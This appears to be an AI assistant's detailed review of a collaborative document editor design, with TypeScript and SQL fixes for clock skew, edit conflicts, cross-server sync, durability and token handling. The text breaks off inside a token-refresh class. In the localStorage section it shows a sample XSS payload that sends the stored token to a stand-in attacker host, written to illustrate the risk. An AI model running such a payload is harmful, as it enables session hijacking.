Here's the architecture for a real-time collaborative document editor (like Google Docs):

**System Overview:**
- Frontend: React SPA with WebSocket connections
- Backend: Node.js API servers behind a load balancer (round-robin)
- Database: PostgreSQL for document storage, Redis for session cache
- Real-time: Each API server maintains its own WebSocket connections to clients
- Sync Strategy: Last-write-wins with timestamps from client clocks
- Storage: Documents saved as full HTML snapshots every 30 seconds
- Auth: JWT tokens with 24-hour expiry, stored in localStorage
- CDN: CloudFront for static assets, also caches API responses for 5 minutes

**Data Flow:**
1. User types → change event sent via WebSocket to their connected server
2. Server writes change to PostgreSQL
3. Server broadcasts change to all WebSocket clients connected to THAT server
4. Other servers poll PostgreSQL every 2 seconds for changes
5. Conflict resolution: if two users edit the same paragraph, last timestamp wins

**Scaling Plan:**
- Horizontal scaling by adding more API servers
- Database read replicas for read-heavy operations
- Document partitioning by organization ID

Identify all potential failure modes, race conditions, and scaling bottlenecks in this architecture. For each issue found, propose a specific solution with trade-offs.
This architecture has several critical issues that will cause data loss, poor user experience, and scaling problems. Let me analyze each systematically.
**Issue: Client Clock Timestamps for Conflict Resolution**

The Problem: Using client clocks for conflict resolution is fundamentally broken. Client clocks can be wrong by hours, days, or even years.
Timeline (Server Time):
10:00:00 - Alice types "Hello" (Alice's clock says 15:00:00)
10:00:01 - Bob types "World" (Bob's clock says 09:00:00)
Result: Alice's edit wins because 15:00:00 > 09:00:00
Bob's edit is silently discarded, even though it came AFTER Alice's
Real-world scenarios that break this: devices with skewed or unsynchronized clocks, misconfigured timezones, laptops waking from sleep with stale time, and users who deliberately set their clock forward or back.
Solution: Hybrid Logical Clocks (HLC) or Server-Assigned Lamport Timestamps
// Hybrid Logical Clock implementation
interface HLC {
wallTime: number; // Physical time from server
logical: number; // Logical counter for ordering
nodeId: string; // Tie-breaker for simultaneous events
}
class HybridLogicalClock {
private wallTime: number = 0;
private logical: number = 0;
private nodeId: string;
constructor(nodeId: string) {
this.nodeId = nodeId;
}
// Called when sending an event
tick(): HLC {
const now = Date.now();
if (now > this.wallTime) {
this.wallTime = now;
this.logical = 0;
} else {
this.logical++;
}
return { wallTime: this.wallTime, logical: this.logical, nodeId: this.nodeId };
}
// Called when receiving an event
receive(remote: HLC): HLC {
const now = Date.now();
if (now > this.wallTime && now > remote.wallTime) {
this.wallTime = now;
this.logical = 0;
} else if (this.wallTime > remote.wallTime) {
this.logical++;
} else if (remote.wallTime > this.wallTime) {
this.wallTime = remote.wallTime;
this.logical = remote.logical + 1;
} else {
// Equal wall times
this.logical = Math.max(this.logical, remote.logical) + 1;
}
return { wallTime: this.wallTime, logical: this.logical, nodeId: this.nodeId };
}
// Compare two HLCs
static compare(a: HLC, b: HLC): number {
if (a.wallTime !== b.wallTime) return a.wallTime - b.wallTime;
if (a.logical !== b.logical) return a.logical - b.logical;
return a.nodeId.localeCompare(b.nodeId);
}
}
Trade-offs:
| Approach | Pros | Cons |
|---|---|---|
| HLC | Preserves causality, tolerates clock drift | Slightly more complex, ~24 bytes per timestamp |
| Server timestamps only | Simple | Doesn't capture happens-before relationships |
| Vector clocks | Perfect causality tracking | O(n) space where n = number of clients |
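A quick usage sketch of the clock above: even a client clock five hours fast cannot reorder causally related events, because `receive` always advances the local clock past the remote timestamp.

```typescript
// Usage sketch (assumes the HybridLogicalClock class above)
const server = new HybridLogicalClock('server-a');

// Event from a client whose wall clock is 5 hours ahead
const skewed: HLC = { wallTime: Date.now() + 5 * 3600 * 1000, logical: 0, nodeId: 'client-1' };

const before = server.tick();          // local event before the skewed message arrives
const merged = server.receive(skewed); // receiving bumps us past the remote timestamp
const after = server.tick();           // causally after the receive

console.log(HybridLogicalClock.compare(before, merged) < 0); // true
console.log(HybridLogicalClock.compare(merged, after) < 0);  // true
```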
**Issue: Paragraph-Level Last-Write-Wins Destroys Edits**

The Problem: When two users edit the same paragraph, one user's work is completely discarded.
Original paragraph: "The quick brown fox"
Alice (10:00:00): Changes to "The quick brown fox jumps"
Bob (10:00:01): Changes to "The slow brown fox"
Result: "The slow brown fox"
Alice's addition of "jumps" is silently lost
Solution: Operational Transformation (OT) or CRDTs
For a Google Docs-like experience, OT is the industry standard:
// Operational Transformation for text
type Operation =
| { type: 'retain'; count: number }
| { type: 'insert'; text: string }
| { type: 'delete'; count: number };
class OTDocument {
private content: string = '';
private revision: number = 0;
// Transform operation A against operation B
// Returns A' such that apply(apply(doc, B), A') === apply(apply(doc, A), B')
static transform(a: Operation[], b: Operation[]): [Operation[], Operation[]] {
const aPrime: Operation[] = [];
const bPrime: Operation[] = [];
let indexA = 0, indexB = 0;
let opA = a[indexA], opB = b[indexB];
while (opA || opB) {
// Insert operations go first
if (opA?.type === 'insert') {
aPrime.push(opA);
bPrime.push({ type: 'retain', count: opA.text.length });
opA = a[++indexA];
continue;
}
if (opB?.type === 'insert') {
bPrime.push(opB);
aPrime.push({ type: 'retain', count: opB.text.length });
opB = b[++indexB];
continue;
}
// Both remaining ops are retain or delete - consume the overlapping length
if (!opA || !opB) break; // balanced operations exhaust together; bail on malformed input
const len = Math.min(opA.count, opB.count);
if (opA.type === 'retain' && opB.type === 'retain') {
aPrime.push({ type: 'retain', count: len });
bPrime.push({ type: 'retain', count: len });
} else if (opA.type === 'delete' && opB.type === 'retain') {
aPrime.push({ type: 'delete', count: len }); // A deletes text that B retained
} else if (opA.type === 'retain' && opB.type === 'delete') {
bPrime.push({ type: 'delete', count: len }); // B deletes text that A retained
} // both delete: the text is already gone on both sides - emit nothing
// Advance or shrink each op by the consumed length
opA = opA.count === len ? a[++indexA] : { ...opA, count: opA.count - len };
opB = opB.count === len ? b[++indexB] : { ...opB, count: opB.count - len };
}
return [aPrime, bPrime];
}
// Apply operation to document
apply(ops: Operation[]): void {
let index = 0;
let newContent = '';
for (const op of ops) {
switch (op.type) {
case 'retain':
newContent += this.content.slice(index, index + op.count);
index += op.count;
break;
case 'insert':
newContent += op.text;
break;
case 'delete':
index += op.count;
break;
}
}
newContent += this.content.slice(index);
this.content = newContent;
this.revision++;
}
}
// Server-side OT handling
class OTServer {
private document: OTDocument;
private history: Operation[][] = [];
receiveOperation(clientRevision: number, ops: Operation[]): Operation[] {
// Transform against all operations that happened since client's revision
let transformedOps = ops;
for (let i = clientRevision; i < this.history.length; i++) {
const [newOps] = OTDocument.transform(transformedOps, this.history[i]);
transformedOps = newOps;
}
this.document.apply(transformedOps);
this.history.push(transformedOps);
return transformedOps;
}
}
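A quick sanity check for the transform: applying the two operation sequences in either order should converge. The `applyOps` helper below is a hypothetical standalone mirror of `OTDocument.apply` over plain strings.

```typescript
// Convergence check for OTDocument.transform
function applyOps(doc: string, ops: Operation[]): string {
  let index = 0;
  let out = '';
  for (const op of ops) {
    if (op.type === 'retain') { out += doc.slice(index, index + op.count); index += op.count; }
    else if (op.type === 'insert') { out += op.text; }
    else { index += op.count; } // delete: skip characters
  }
  return out + doc.slice(index);
}

const base = 'abc';
const opsA: Operation[] = [{ type: 'insert', text: 'X' }, { type: 'retain', count: 3 }]; // "Xabc"
const opsB: Operation[] = [{ type: 'retain', count: 2 }, { type: 'delete', count: 1 }];  // "ab"

const [aPrime, bPrime] = OTDocument.transform(opsA, opsB);
console.log(applyOps(applyOps(base, opsB), aPrime)); // "Xab"
console.log(applyOps(applyOps(base, opsA), bPrime)); // "Xab" - both orders converge
```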
Alternative: CRDTs (Conflict-free Replicated Data Types)
// Simplified RGA (Replicated Growable Array) CRDT for text
interface RGANode {
id: { timestamp: HLC; nodeId: string };
char: string | null; // null = tombstone (deleted)
parent: RGANode['id'] | null;
}
class RGADocument {
private nodes: Map<string, RGANode> = new Map();
private clock: HybridLogicalClock;
constructor(nodeId: string) {
this.clock = new HybridLogicalClock(nodeId);
}
insert(position: number, char: string): RGANode {
const parentId = this.getNodeAtPosition(position - 1)?.id ?? null;
const timestamp = this.clock.tick(); // tick() already stamps this replica's nodeId
const node: RGANode = {
id: { timestamp, nodeId: timestamp.nodeId },
char,
parent: parentId
};
this.nodes.set(this.nodeIdToString(node.id), node);
return node;
}
delete(position: number): void {
const node = this.getNodeAtPosition(position);
if (node) node.char = null; // Tombstone
}
merge(remoteNode: RGANode): void {
const key = this.nodeIdToString(remoteNode.id);
if (!this.nodes.has(key)) {
this.nodes.set(key, remoteNode);
this.clock.receive(remoteNode.id.timestamp);
}
}
getText(): string {
return this.getOrderedNodes()
.filter(n => n.char !== null)
.map(n => n.char)
.join('');
}
private nodeIdToString(id: RGANode['id']): string {
return `${id.timestamp.wallTime}-${id.timestamp.logical}-${id.nodeId}`;
}
private getNodeAtPosition(position: number): RGANode | null {
const visible = this.getOrderedNodes().filter(n => n.char !== null);
return visible[position] ?? null;
}
private getOrderedNodes(): RGANode[] {
// Tree walk: every node sits after its parent, and concurrent siblings
// are ordered newest-first (the RGA rule) using the HLC as tie-breaker
const children = new Map<string, RGANode[]>();
for (const node of this.nodes.values()) {
const key = node.parent ? this.nodeIdToString(node.parent) : 'ROOT';
if (!children.has(key)) children.set(key, []);
children.get(key)!.push(node);
}
for (const siblings of children.values()) {
siblings.sort((x, y) => HybridLogicalClock.compare(y.id.timestamp, x.id.timestamp));
}
const ordered: RGANode[] = [];
const visit = (key: string): void => {
for (const node of children.get(key) ?? []) {
ordered.push(node);
visit(this.nodeIdToString(node.id));
}
};
visit('ROOT');
return ordered;
}
}
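A minimal convergence sketch, assuming the helpers above: two replicas exchange nodes via `merge` and settle on the same text.

```typescript
// Two-replica convergence demo (assumes the RGADocument class above)
const alice = new RGADocument('alice');
const bob = new RGADocument('bob');

const h = alice.insert(0, 'H');
const i = alice.insert(1, 'i');
bob.merge(h);
bob.merge(i);

const bang = bob.insert(2, '!');
alice.merge(bang);

console.log(alice.getText()); // "Hi!"
console.log(bob.getText());   // "Hi!"
```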
Trade-offs:
| Approach | Pros | Cons |
|---|---|---|
| OT | Compact operations, well-understood | Requires central server for ordering, complex transform functions |
| CRDT | Decentralized, works offline | Larger metadata overhead, tombstones accumulate |
| Last-write-wins | Simple | Loses data |
Recommendation: Use OT for real-time sync (like Google Docs does) with CRDT for offline support.
**Issue: Cross-Server WebSocket Isolation**

The Problem: With round-robin load balancing, users on the same document connect to different servers. Changes only broadcast to clients on the SAME server.
Document: "Project Proposal"
Server A: Server B:
├── Alice (editing) ├── Bob (editing)
└── Charlie (viewing) └── Diana (viewing)
Alice types "Hello" → Charlie sees it immediately
→ Bob and Diana wait up to 2 seconds (polling interval)
This creates a jarring, inconsistent experience where some users see real-time updates and others see delayed updates.
Solution: Redis Pub/Sub for Cross-Server Broadcasting
import Redis from 'ioredis';
import { WebSocket } from 'ws';
import crypto from 'node:crypto';
class DocumentSyncService {
private redisPub: Redis;
private redisSub: Redis;
private localClients: Map<string, Set<WebSocket>> = new Map();
private serverId: string;
constructor() {
this.serverId = crypto.randomUUID();
this.redisPub = new Redis(process.env.REDIS_URL);
this.redisSub = new Redis(process.env.REDIS_URL);
this.setupSubscriptions();
}
private setupSubscriptions(): void {
this.redisSub.psubscribe('doc:*', (err) => {
if (err) console.error('Failed to subscribe:', err);
});
this.redisSub.on('pmessage', (pattern, channel, message) => {
const documentId = channel.replace('doc:', '');
const parsed = JSON.parse(message);
// Don't re-broadcast our own messages
if (parsed.serverId === this.serverId) return;
this.broadcastToLocalClients(documentId, parsed.payload);
});
}
async publishChange(documentId: string, change: DocumentChange): Promise<void> {
const message = JSON.stringify({
serverId: this.serverId,
payload: change,
timestamp: Date.now()
});
// Publish to Redis for other servers
await this.redisPub.publish(`doc:${documentId}`, message);
// Also broadcast to local clients
this.broadcastToLocalClients(documentId, change);
}
private broadcastToLocalClients(documentId: string, change: DocumentChange): void {
const clients = this.localClients.get(documentId);
if (!clients) return;
const message = JSON.stringify(change);
for (const client of clients) {
if (client.readyState === WebSocket.OPEN) {
client.send(message);
}
}
}
registerClient(documentId: string, ws: WebSocket): void {
if (!this.localClients.has(documentId)) {
this.localClients.set(documentId, new Set());
}
this.localClients.get(documentId)!.add(ws);
ws.on('close', () => {
this.localClients.get(documentId)?.delete(ws);
});
}
}
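On each API server, the sync service might be wired into the WebSocket layer roughly like this; `getDocumentId` and the `wss` instance are assumptions for illustration.

```typescript
// Hypothetical wiring on each API server (names are illustrative)
const syncService = new DocumentSyncService();

wss.on('connection', (ws, request) => {
  const documentId = getDocumentId(request); // assumed helper, e.g. parses /ws?documentId=...
  syncService.registerClient(documentId, ws);

  ws.on('message', async (raw) => {
    const change = JSON.parse(raw.toString()) as DocumentChange;
    // Fan out to local clients and, via Redis, to every other server
    await syncService.publishChange(documentId, change);
  });
});
```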
Alternative: Sticky Sessions with Consistent Hashing
// Nginx configuration for sticky sessions based on document ID
/*
upstream api_servers {
hash $arg_documentId consistent;
server api1:3000;
server api2:3000;
server api3:3000;
}
*/
// Or implement in application load balancer
class DocumentAwareLoadBalancer {
private servers: string[];
private hashRing: ConsistentHashRing;
constructor(servers: string[]) {
this.servers = servers;
this.hashRing = new ConsistentHashRing(servers, 150); // 150 virtual nodes
}
getServerForDocument(documentId: string): string {
return this.hashRing.getNode(documentId);
}
// Handle server failures gracefully
removeServer(server: string): void {
this.hashRing.removeNode(server);
// Clients will reconnect and get routed to new server
}
}
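The `ConsistentHashRing` referenced above (and again in the sharding section) can be as simple as a sorted array of hashed virtual nodes; a minimal sketch:

```typescript
import { createHash } from 'node:crypto';

// Minimal consistent hash ring sketch (assumed by the classes above)
class ConsistentHashRing {
  private ring: { point: number; node: string }[] = [];

  constructor(nodes: string[], private virtualNodes: number = 100) {
    for (const node of nodes) this.addNode(node);
  }

  private hash(key: string): number {
    return createHash('md5').update(key).digest().readUInt32BE(0);
  }

  addNode(node: string): void {
    for (let v = 0; v < this.virtualNodes; v++) {
      this.ring.push({ point: this.hash(`${node}#${v}`), node });
    }
    this.ring.sort((a, b) => a.point - b.point);
  }

  removeNode(node: string): void {
    this.ring = this.ring.filter(entry => entry.node !== node);
  }

  getNode(key: string): string {
    if (this.ring.length === 0) throw new Error('Ring is empty');
    const point = this.hash(key);
    // First virtual node clockwise from the key's hash (wrap to the start)
    const entry = this.ring.find(e => e.point >= point) ?? this.ring[0];
    return entry.node;
  }
}
```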
Trade-offs:
| Approach | Pros | Cons |
|---|---|---|
| Redis Pub/Sub | Decoupled servers, any server can handle any doc | Additional infrastructure, Redis becomes SPOF |
| Sticky sessions | Simpler, no cross-server communication | Uneven load, complex failover |
| Dedicated doc servers | Best performance per document | Complex routing, underutilization |
**Issue: PostgreSQL Polling for Cross-Server Sync**

The Problem: Even with Redis Pub/Sub, the architecture mentions polling PostgreSQL every 2 seconds as a fallback. This creates: up to 2 seconds of extra latency for cross-server updates, a constant query load that grows linearly with the number of servers, and wasted work on every poll where nothing has changed.
Solution: Event-Driven Architecture with PostgreSQL LISTEN/NOTIFY
import { Pool, Client } from 'pg';
class PostgresChangeNotifier {
private listenerClient: Client;
private pool: Pool;
private handlers: Map<string, Set<(change: any) => void>> = new Map();
async initialize(): Promise<void> {
this.listenerClient = new Client(process.env.DATABASE_URL);
await this.listenerClient.connect();
await this.listenerClient.query('LISTEN document_changes');
this.listenerClient.on('notification', (msg) => {
if (msg.channel === 'document_changes' && msg.payload) {
const change = JSON.parse(msg.payload);
this.notifyHandlers(change.document_id, change);
}
});
}
subscribe(documentId: string, handler: (change: any) => void): () => void {
if (!this.handlers.has(documentId)) {
this.handlers.set(documentId, new Set());
}
this.handlers.get(documentId)!.add(handler);
// Return unsubscribe function
return () => {
this.handlers.get(documentId)?.delete(handler);
};
}
private notifyHandlers(documentId: string, change: any): void {
const handlers = this.handlers.get(documentId);
if (handlers) {
for (const handler of handlers) {
handler(change);
}
}
}
}
// Database trigger to send notifications
/*
CREATE OR REPLACE FUNCTION notify_document_change()
RETURNS TRIGGER AS $$
BEGIN
PERFORM pg_notify(
'document_changes',
json_build_object(
'document_id', NEW.document_id,
'operation_id', NEW.id,
'operation', NEW.operation,
'revision', NEW.revision
)::text
);
RETURN NEW;
END;
$$ LANGUAGE plpgsql;
CREATE TRIGGER document_change_trigger
AFTER INSERT ON document_operations
FOR EACH ROW EXECUTE FUNCTION notify_document_change();
*/
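Bridging the notifications into the real-time layer could look like the sketch below (document ID hardcoded for illustration). One caveat: pg_notify payloads are capped at roughly 8000 bytes by default, so sending IDs and re-fetching beats inlining large operations.

```typescript
// Sketch: bridge LISTEN/NOTIFY into the real-time layer (names illustrative)
async function startChangeBridge(): Promise<() => void> {
  const notifier = new PostgresChangeNotifier();
  await notifier.initialize();

  // Payloads carry IDs and revisions rather than content (8000-byte limit)
  return notifier.subscribe('doc-123', (change) => {
    // Re-fetch the operation by change.operation_id if needed,
    // then fan out to local WebSocket clients
    console.log('op', change.operation_id, 'revision', change.revision);
  });
}
```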
**Issue: 30-Second Snapshot Data Loss Window**

The Problem: If a server crashes, up to 30 seconds of work is lost. For a real-time editor, this is catastrophic.
Timeline:
00:00 - Snapshot saved
00:15 - Alice types 500 words
00:29 - Server crashes
00:30 - Server restarts
Result: Alice's 500 words are gone forever
Solution: Operation Log with Periodic Compaction
interface DocumentOperation {
id: string;
documentId: string;
userId: string;
revision: number;
operation: Operation[]; // OT operations
timestamp: HLC;
checksum: string;
}
class DurableDocumentStore {
private pool: Pool;
private redis: Redis;
async applyOperation(op: DocumentOperation): Promise<void> {
const client = await this.pool.connect();
try {
await client.query('BEGIN');
// 1. Append to operation log (durable)
await client.query(`
INSERT INTO document_operations
(id, document_id, user_id, revision, operation, timestamp, checksum)
VALUES ($1, $2, $3, $4, $5, $6, $7)
`, [op.id, op.documentId, op.userId, op.revision,
JSON.stringify(op.operation), op.timestamp, op.checksum]);
// 2. Update materialized view (for fast reads)
await client.query(`
UPDATE documents
SET current_revision = $1,
last_modified = NOW(),
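-- apply_operation is an assumed custom PL/pgSQL function that applies
-- the OT operation server-side; it is not a PostgreSQL built-in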
content = apply_operation(content, $2)
WHERE id = $3 AND current_revision = $4
`, [op.revision, JSON.stringify(op.operation), op.documentId, op.revision - 1]);
await client.query('COMMIT');
// 3. Cache in Redis for real-time sync
await this.redis.xadd(
`doc:${op.documentId}:ops`,
'MAXLEN', '~', '10000', // Keep last ~10k operations
'*',
'data', JSON.stringify(op)
);
} catch (error) {
await client.query('ROLLBACK');
throw error;
} finally {
client.release();
}
}
// Periodic compaction job
async compactDocument(documentId: string): Promise<void> {
const client = await this.pool.connect();
try {
await client.query('BEGIN');
// Get current state
const { rows: [doc] } = await client.query(
'SELECT content, current_revision FROM documents WHERE id = $1 FOR UPDATE',
[documentId]
);
// Create snapshot
await client.query(`
INSERT INTO document_snapshots (document_id, revision, content, created_at)
VALUES ($1, $2, $3, NOW())
`, [documentId, doc.current_revision, doc.content]);
// Delete old operations (keep last 1000 for undo history)
await client.query(`
DELETE FROM document_operations
WHERE document_id = $1
AND revision < $2 - 1000
`, [documentId, doc.current_revision]);
await client.query('COMMIT');
} finally {
client.release();
}
}
// Recover document from operations
async recoverDocument(documentId: string): Promise<string> {
// Find latest snapshot
const { rows: [snapshot] } = await this.pool.query(`
SELECT content, revision FROM document_snapshots
WHERE document_id = $1
ORDER BY revision DESC LIMIT 1
`, [documentId]);
let content = snapshot?.content ?? '';
let fromRevision = snapshot?.revision ?? 0;
// Apply all operations since snapshot
const { rows: operations } = await this.pool.query(`
SELECT operation FROM document_operations
WHERE document_id = $1 AND revision > $2
ORDER BY revision ASC
`, [documentId, fromRevision]);
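// applyOperation is an assumed helper that replays an OT operation
// against a plain string (the standalone analogue of OTDocument.apply)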
for (const op of operations) {
content = applyOperation(content, JSON.parse(op.operation));
}
return content;
}
}
Database Schema:
-- Immutable operation log
CREATE TABLE document_operations (
id UUID PRIMARY KEY,
document_id UUID NOT NULL REFERENCES documents(id),
user_id UUID NOT NULL REFERENCES users(id),
revision BIGINT NOT NULL,
operation JSONB NOT NULL,
timestamp JSONB NOT NULL, -- HLC
checksum VARCHAR(64) NOT NULL,
created_at TIMESTAMPTZ DEFAULT NOW(),
UNIQUE(document_id, revision)
);
-- Index for efficient replay
CREATE INDEX idx_doc_ops_replay
ON document_operations(document_id, revision);
-- Periodic snapshots for fast recovery
CREATE TABLE document_snapshots (
id UUID PRIMARY KEY DEFAULT gen_random_uuid(),
document_id UUID NOT NULL REFERENCES documents(id),
revision BIGINT NOT NULL,
content TEXT NOT NULL,
created_at TIMESTAMPTZ DEFAULT NOW(),
UNIQUE(document_id, revision)
);
-- Materialized current state (for fast reads)
CREATE TABLE documents (
id UUID PRIMARY KEY,
title VARCHAR(500),
content TEXT,
current_revision BIGINT DEFAULT 0,
created_at TIMESTAMPTZ DEFAULT NOW(),
last_modified TIMESTAMPTZ DEFAULT NOW()
);
Trade-offs:
| Approach | Pros | Cons |
|---|---|---|
| Operation log | Zero data loss, full history | Storage grows, need compaction |
| Frequent snapshots | Simple recovery | Still some data loss window |
| Write-ahead log | Database handles durability | Tied to specific database |
**Issue: Full HTML Snapshot Storage**

The Problem: Storing documents as raw HTML snapshots means user-supplied markup is persisted and re-served verbatim (an XSS vector), every save rewrites the entire document no matter how small the change, and there is no operation history to support undo, audit, or merging.
Solution: Structured Document Model with Delta Storage
// Structured document model (similar to ProseMirror/Slate)
interface DocumentNode {
type: 'doc' | 'paragraph' | 'heading' | 'list' | 'listItem' | 'text';
content?: DocumentNode[];
text?: string;
marks?: Mark[]; // bold, italic, link, etc.
attrs?: Record<string, any>;
}
interface Mark {
type: 'bold' | 'italic' | 'underline' | 'link' | 'code';
attrs?: Record<string, any>;
}
// Example document
const exampleDoc: DocumentNode = {
type: 'doc',
content: [
{
type: 'heading',
attrs: { level: 1 },
content: [{ type: 'text', text: 'My Document' }]
},
{
type: 'paragraph',
content: [
{ type: 'text', text: 'Hello ' },
{ type: 'text', text: 'world', marks: [{ type: 'bold' }] }
]
}
]
};
// Sanitization on input
class DocumentSanitizer {
private allowedNodeTypes = new Set([
'doc', 'paragraph', 'heading', 'list', 'listItem', 'text',
'blockquote', 'codeBlock', 'image', 'table', 'tableRow', 'tableCell'
]);
private allowedMarks = new Set([
'bold', 'italic', 'underline', 'strike', 'code', 'link'
]);
sanitize(node: DocumentNode): DocumentNode {
if (!this.allowedNodeTypes.has(node.type)) {
// Convert unknown types to paragraph
return { type: 'paragraph', content: this.sanitizeContent(node.content) };
}
return {
type: node.type,
...(node.text && { text: this.sanitizeText(node.text) }),
...(node.content && { content: this.sanitizeContent(node.content) }),
...(node.marks && { marks: this.sanitizeMarks(node.marks) }),
...(node.attrs && { attrs: this.sanitizeAttrs(node.type, node.attrs) })
};
}
private sanitizeContent(content?: DocumentNode[]): DocumentNode[] {
return (content ?? []).map(child => this.sanitize(child));
}
private sanitizeText(text: string): string {
// Remove any potential script injections
return text.replace(/<[^>]*>/g, '');
}
private sanitizeMarks(marks: Mark[]): Mark[] {
return marks.filter(m => this.allowedMarks.has(m.type));
}
private sanitizeAttrs(nodeType: string, attrs: Record<string, any>): Record<string, any> {
const sanitized: Record<string, any> = {};
switch (nodeType) {
case 'heading':
sanitized.level = Math.min(6, Math.max(1, parseInt(attrs.level) || 1));
break;
case 'link':
// Only allow safe URL schemes
if (attrs.href && /^https?:\/\//.test(attrs.href)) {
sanitized.href = attrs.href;
}
break;
case 'image':
if (attrs.src && /^https?:\/\//.test(attrs.src)) {
sanitized.src = attrs.src;
sanitized.alt = String(attrs.alt || '').slice(0, 500);
}
break;
}
return sanitized;
}
}
// Render to HTML only on output
class DocumentRenderer {
render(node: DocumentNode): string {
switch (node.type) {
case 'doc':
return node.content?.map(n => this.render(n)).join('') ?? '';
case 'paragraph':
return `<p>${this.renderContent(node)}</p>`;
case 'heading': {
const level = node.attrs?.level ?? 1;
return `<h${level}>${this.renderContent(node)}</h${level}>`;
}
case 'text': {
let text = this.escapeHtml(node.text ?? '');
for (const mark of node.marks ?? []) {
text = this.applyMark(text, mark);
}
return text;
}
default:
return this.renderContent(node);
}
}
// Render all child nodes (helper used by the cases above)
private renderContent(node: DocumentNode): string {
return node.content?.map(n => this.render(n)).join('') ?? '';
}
private escapeHtml(text: string): string {
return text
.replace(/&/g, '&amp;')
.replace(/</g, '&lt;')
.replace(/>/g, '&gt;')
.replace(/"/g, '&quot;');
}
private applyMark(text: string, mark: Mark): string {
switch (mark.type) {
case 'bold': return `<strong>${text}</strong>`;
case 'italic': return `<em>${text}</em>`;
case 'code': return `<code>${text}</code>`;
case 'link': return `<a href="${this.escapeHtml(mark.attrs?.href ?? '')}">${text}</a>`;
default: return text;
}
}
}
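Running the renderer over the `exampleDoc` from earlier shows the escape-on-output flow:

```typescript
// Usage sketch: structured model in, escaped HTML out
const renderer = new DocumentRenderer();
console.log(renderer.render(exampleDoc));
// <h1>My Document</h1><p>Hello <strong>world</strong></p>
```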
**Issue: JWT Tokens in localStorage**

The Problem: Any XSS vulnerability (from user content, third-party scripts, browser extensions) can steal tokens.
// Attacker's XSS payload
fetch('https://evil.com/steal', {
method: 'POST',
body: localStorage.getItem('token')
});
// Attacker now has 24-hour access to victim's account
Solution: HTTP-Only Cookies with Proper Security Flags
// Server-side: Set secure cookies
import { Request, Response, NextFunction } from 'express';
import crypto from 'node:crypto';
class AuthService {
setAuthCookies(res: Response, tokens: { accessToken: string; refreshToken: string }): void {
// Access token - short lived, used for API calls
res.cookie('access_token', tokens.accessToken, {
httpOnly: true, // Not accessible via JavaScript
secure: true, // HTTPS only
sameSite: 'strict', // CSRF protection
maxAge: 15 * 60 * 1000, // 15 minutes
path: '/api' // Only sent to API routes
});
// Refresh token - longer lived, only sent to refresh endpoint
res.cookie('refresh_token', tokens.refreshToken, {
httpOnly: true,
secure: true,
sameSite: 'strict',
maxAge: 7 * 24 * 60 * 60 * 1000, // 7 days
path: '/api/auth/refresh' // Only sent to refresh endpoint
});
// CSRF token - readable by JavaScript, verified on state-changing requests
const csrfToken = crypto.randomBytes(32).toString('hex');
res.cookie('csrf_token', csrfToken, {
httpOnly: false, // Readable by JavaScript
secure: true,
sameSite: 'strict',
maxAge: 15 * 60 * 1000
});
}
}
// Middleware to verify CSRF token
function csrfProtection(req: Request, res: Response, next: NextFunction): void {
if (['POST', 'PUT', 'DELETE', 'PATCH'].includes(req.method)) {
const cookieToken = req.cookies.csrf_token;
const headerToken = req.headers['x-csrf-token'];
if (!cookieToken || !headerToken || cookieToken !== headerToken) {
return res.status(403).json({ error: 'Invalid CSRF token' });
}
}
next();
}
// Client-side: Include CSRF token in requests
class ApiClient {
private getCsrfToken(): string {
return document.cookie
.split('; ')
.find(row => row.startsWith('csrf_token='))
?.split('=')[1] ?? '';
}
async request(url: string, options: RequestInit = {}): Promise<Response> {
return fetch(url, {
...options,
credentials: 'include', // Include cookies
headers: {
...options.headers,
'X-CSRF-Token': this.getCsrfToken()
}
});
}
}
WebSocket Authentication:
// WebSocket connections need special handling since they don't send cookies automatically
class SecureWebSocketServer {
handleUpgrade(request: IncomingMessage, socket: Socket, head: Buffer): void {
// Option 1: Verify cookie on upgrade
const cookies = this.parseCookies(request.headers.cookie ?? '');
const accessToken = cookies.access_token;
try {
const payload = this.verifyToken(accessToken);
this.wss.handleUpgrade(request, socket, head, (ws) => {
(ws as any).userId = payload.userId;
this.wss.emit('connection', ws, request);
});
} catch (error) {
socket.write('HTTP/1.1 401 Unauthorized\r\n\r\n');
socket.destroy();
}
}
// Option 2: Ticket-based authentication
async generateWebSocketTicket(userId: string): Promise<string> {
const ticket = crypto.randomBytes(32).toString('hex');
// Store ticket with short expiry
await this.redis.setex(`ws_ticket:${ticket}`, 30, userId);
return ticket;
}
async validateTicket(ticket: string): Promise<string | null> {
const userId = await this.redis.get(`ws_ticket:${ticket}`);
if (userId) {
await this.redis.del(`ws_ticket:${ticket}`); // One-time use
}
return userId;
}
}
Trade-offs:
| Approach | Pros | Cons |
|---|---|---|
| HTTP-only cookies | XSS-resistant | Need CSRF protection, more complex |
| localStorage + fingerprinting | Simpler | Vulnerable to XSS |
| Session IDs only | Most secure | Requires server-side session store |
**Issue: 24-Hour Token Expiry**

The Problem: If a token is compromised, the attacker has 24 hours of access. For a document editor with sensitive content, this is too risky.
Solution: Short-Lived Access Tokens with Refresh Token Rotation
import jwt from 'jsonwebtoken';
import crypto from 'node:crypto';
import Redis from 'ioredis';
interface TokenPair { accessToken: string; refreshToken: string; }
class TokenService {
private redis: Redis;
private readonly ACCESS_TOKEN_EXPIRY = '15m';
private readonly REFRESH_TOKEN_EXPIRY = '7d';
async generateTokenPair(userId: string): Promise<TokenPair> {
const tokenFamily = crypto.randomUUID();
const accessToken = jwt.sign(
{ userId, type: 'access' },
process.env.JWT_SECRET!,
{ expiresIn: this.ACCESS_TOKEN_EXPIRY }
);
const refreshToken = jwt.sign(
{ userId, type: 'refresh', family: tokenFamily },
process.env.JWT_REFRESH_SECRET!,
{ expiresIn: this.REFRESH_TOKEN_EXPIRY }
);
// Store refresh token hash for revocation
await this.redis.setex(
`refresh:${tokenFamily}`,
7 * 24 * 60 * 60,
JSON.stringify({
userId,
tokenHash: this.hashToken(refreshToken),
createdAt: Date.now()
})
);
return { accessToken, refreshToken };
}
async refreshTokens(refreshToken: string): Promise<TokenPair | null> {
try {
const payload = jwt.verify(refreshToken, process.env.JWT_REFRESH_SECRET!) as any;
// Check if token family is still valid
const storedData = await this.redis.get(`refresh:${payload.family}`);
if (!storedData) {
// Token family was revoked - possible token theft!
await this.revokeAllUserSessions(payload.userId);
return null;
}
const stored = JSON.parse(storedData);
// Verify token hash matches
if (stored.tokenHash !== this.hashToken(refreshToken)) {
// Token reuse detected - revoke family
await this.redis.del(`refresh:${payload.family}`);
await this.revokeAllUserSessions(payload.userId);
return null;
}
// Generate new token pair (rotation)
const newTokens = await this.generateTokenPair(payload.userId);
// Invalidate old family
await this.redis.del(`refresh:${payload.family}`);
return newTokens;
} catch (error) {
return null;
}
}
